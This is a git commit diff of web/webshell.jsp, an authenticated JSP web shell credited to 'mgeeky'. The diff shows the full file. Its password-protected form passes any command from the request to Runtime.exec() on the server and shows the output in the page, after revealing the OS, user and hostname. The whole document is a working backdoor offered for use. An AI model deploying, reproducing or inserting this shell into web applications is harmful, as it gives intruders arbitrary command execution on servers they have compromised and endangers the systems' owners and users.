Webshell.jsp updated
parent
685a6428ed
commit
f0f68868f3
110
web/webshell.jsp
110
web/webshell.jsp
|
@ -5,79 +5,79 @@
|
||||||
<%!
|
<%!
|
||||||
|
|
||||||
// =====================================================================
|
// =====================================================================
|
||||||
// Setup global password necessary to pass before using that webshell.
|
// Setup global password necessary to pass before using that webshell.
|
||||||
public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r";
|
public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r";
|
||||||
|
|
||||||
// =====================================================================
|
// =====================================================================
|
||||||
|
|
||||||
public String execute(String pass, String cmd, Boolean skip) {
|
public String execute(String pass, String cmd, Boolean skip) {
|
||||||
StringBuilder res = new StringBuilder();
|
StringBuilder res = new StringBuilder();
|
||||||
|
|
||||||
if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){
|
if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){
|
||||||
try {
|
try {
|
||||||
Process proc = Runtime.getRuntime().exec(cmd);
|
Process proc = Runtime.getRuntime().exec(cmd);
|
||||||
OutputStream outs = proc.getOutputStream();
|
OutputStream outs = proc.getOutputStream();
|
||||||
InputStream ins = proc.getInputStream();
|
InputStream ins = proc.getInputStream();
|
||||||
DataInputStream datains = new DataInputStream(ins);
|
DataInputStream datains = new DataInputStream(ins);
|
||||||
String datainsline = datains.readLine();
|
String datainsline = datains.readLine();
|
||||||
|
|
||||||
while ( datainsline != null) {
|
while ( datainsline != null) {
|
||||||
res.append(datainsline + "<br/>");
|
res.append(datainsline + "<br/>");
|
||||||
datainsline = datains.readLine();
|
datainsline = datains.readLine();
|
||||||
}
|
}
|
||||||
} catch( IOException e) {
|
} catch( IOException e) {
|
||||||
return "IOException: " + e.getMessage();
|
return "IOException: " + e.getMessage();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
return "Wrong password or no command issued.";
|
return "Wrong password or no command issued.";
|
||||||
}
|
}
|
||||||
|
|
||||||
String out = res.toString();
|
String out = res.toString();
|
||||||
if (out != null && out.length() > 5 && out.indexOf("<br/>") != -1) {
|
if (out != null && out.length() > 5 && out.indexOf("<br/>") != -1) {
|
||||||
out = out.substring(0, out.length() - 5);
|
out = out.substring(0, out.length() - 5);
|
||||||
}
|
}
|
||||||
out = out.replaceAll("(\r\n|\n\r|\n|\r)", "<br/>");
|
out = out.replaceAll("(\r\n|\n\r|\n|\r)", "<br/>");
|
||||||
return out;
|
return out;
|
||||||
}
|
}
|
||||||
%><!DOCTYPE html>
|
%><!DOCTYPE html>
|
||||||
<html>
|
<html>
|
||||||
<head>
|
<head>
|
||||||
<title>JSP Application</title>
|
<title>JSP Application</title>
|
||||||
</head>
|
</head>
|
||||||
<body>
|
<body>
|
||||||
<h3>Authenticated JSP Webshell.</h3>
|
<h3>Authenticated JSP Webshell.</h3>
|
||||||
<i style="font-size:12px">You need to provide a valid password in order to leverage this application.</i>
|
<i style="font-size:12px">You need to provide a valid password in order to leverage this application.</i>
|
||||||
<br/>
|
<br/>
|
||||||
<font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font>
|
<font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font>
|
||||||
<br/>
|
<br/>
|
||||||
<hr/>
|
<hr/>
|
||||||
<form method=post>
|
<form method=post>
|
||||||
<table style="width:100%; font-size: 12px">
|
<table style="width:100%; font-size: 12px">
|
||||||
<tr>
|
<tr>
|
||||||
<td>OS:</td><td style="width:100%">
|
<td>OS:</td><td style="width:100%">
|
||||||
<% out.print(System.getProperty("os.name")); %>
|
<% out.print(System.getProperty("os.name")); %>
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td><b style="color:red; font-size:10px">Password:</b></td><td style="width:90%"><input type=password width=40 name="password" value='<% out.print((request.getParameter("password") != null) ? request.getParameter("password") : ""); %>' /></td>
|
<td><b style="color:red; font-size:10px">Password:</b></td><td style="width:90%"><input type=password width=40 name="password" value='<% out.print((request.getParameter("password") != null) ? request.getParameter("password") : ""); %>' /></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td><b style="color:blue; font-size:11px"><% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%></b></td><td style="width:90%"><input type=text size=100 name="cmd" value='<% out.print((request.getParameter("cmd") != null) ? request.getParameter("cmd") : "uname -a"); %>' onClick="" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }" /></td>
|
<td><b style="color:blue; font-size:11px"><% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%></b></td><td style="width:90%"><input type=text size=100 name="cmd" value='<% out.print((request.getParameter("cmd") != null) ? request.getParameter("cmd") : "uname -a"); %>' onClick="" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }" /></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td><input type=submit style="position:absolute;left:-9999px;width:1px;height:1px;" tabindex="-1"/></td><td></td>
|
<td><input type=submit style="position:absolute;left:-9999px;width:1px;height:1px;" tabindex="-1"/></td><td></td>
|
||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
</form>
|
</form>
|
||||||
<hr />
|
<hr />
|
||||||
<pre style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"><%
|
<pre style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"><%
|
||||||
if (request.getParameter("cmd") != null && request.getParameter("password") != null) {
|
if (request.getParameter("cmd") != null && request.getParameter("password") != null) {
|
||||||
out.println("<br/>server$ " + request.getParameter("cmd") + "<br/>");
|
out.println("<br/>server$ " + request.getParameter("cmd") + "<br/>");
|
||||||
out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false));
|
out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false));
|
||||||
}
|
}
|
||||||
%></pre>
|
%></pre>
|
||||||
|
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
||||||
|
|